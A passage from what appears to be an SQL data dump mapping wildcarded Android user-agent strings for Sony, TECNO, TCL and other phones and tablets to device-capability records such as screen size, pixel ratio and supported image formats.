Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST21i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST21i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST21i2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST23i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST23i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST25i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST26a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST26i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST26i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ST27i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STARADDICT 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STARADDICT III) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STARSHINE5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STARSHINE_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STARTRAIL 6 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STARTRAIL6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STUDIO ENERGY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; STUDIO X PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SUNSET) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SUNSET2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Sage+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Sensation_Z710e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Sky 5.0Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Sky Plus) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Smartbook S10Q) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Sony Tablet S) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_sony','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Sony Xperia Z3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyC1505) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyD2004) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonLT15a) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonLT15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonLT18i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonLT18iv) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonLT26i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonMT11i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonMT15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonST25i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyEricssonST27i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyLT22i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyLT26ii) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyLT29i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyST21a) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyST21i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyST21i2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyST23i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SonyST26i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Studio 5.0 S II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Stylo) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; T1 7.0) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; T1-701u) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; T1-A21L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; T1-A21w) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TC55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TCL D35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TCL D40 DUAL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TCL D55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TCL J620) AppleWebKit/* (KHTML, like Gecko) Versio/4.0 Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TCL S950) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO L6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO M3) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO P5) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-J7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y2) AppleWebKit/* (KHTML, like Gecko) OPR Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y3+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.6,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO-Y6) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TECNO_P5_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TR10CS1) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TR10RS1) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TURBO DG2014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TURKCELL T50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; TZ49) AppleWebKit/* (KHTML, like Gecko) Chrome Yowser/2.0 Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Tab2A7-10F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tablets','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Tab2A7-20F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_tablets','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Telenor_SmartPlus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Tepuy_T8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ThL W8) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Thunder3 45 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Tornado 348) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Tornado) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Trekker-X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 